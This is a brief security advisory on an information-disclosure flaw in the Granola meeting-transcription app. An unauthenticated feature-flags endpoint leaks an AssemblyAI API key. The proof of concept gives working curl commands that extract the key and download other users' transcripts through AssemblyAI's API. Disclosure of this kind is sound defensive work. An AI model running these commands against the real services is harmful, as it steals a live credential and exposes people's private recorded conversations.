Granola API Endpoint Information Disclosure

A vulnerability has been discovered in Granola that allows for information disclosure.

The Granola app is an electron app for Mac and can be unpacked via asar extract Granola.app/Contents/Resources/app.asar _app.asar

Some of the javascript contains a list of api endpoints.

_app.asar/dist-app/assets/index-DBfOBT0v.js

_app.asar/dist-electron/main/index.js

One of those endpoints, "get-feature-flags," returns data without authentication. This includes a value called "assembly_key." References to AssemblyAI, a backend providing transcription services, were also observed in the electron app. Using that key, it’s possible to download transcripts of audio assumedly recorded via the Granola AI app. Note the transcript data includes links to recordings but those did not appear to be accessible, only text representation. 

Proof of Concept

# Get Assembly AI API key
curl -X POST "https://api.granola.ai/v1/get-feature-flags" \
 -H "X-Client-Version: 5.226.0" \
 -H "Content-Type: application/json" | jq '.[] | select(.feature=="assembly_key")'
# Get transcript IDs
curl https://api.assemblyai.com/v2/transcript \
    -H "Authorization: $apiKey" | jq '.transcripts.[].id' > assembly_ai_transcript_ids
cat assembly_ai_transcript_ids | head -n 1 | tr -d '"' | while read line; do curl https://api.assemblyai.com/v2/transcript/$line -H "Authorization: $apiKey"; done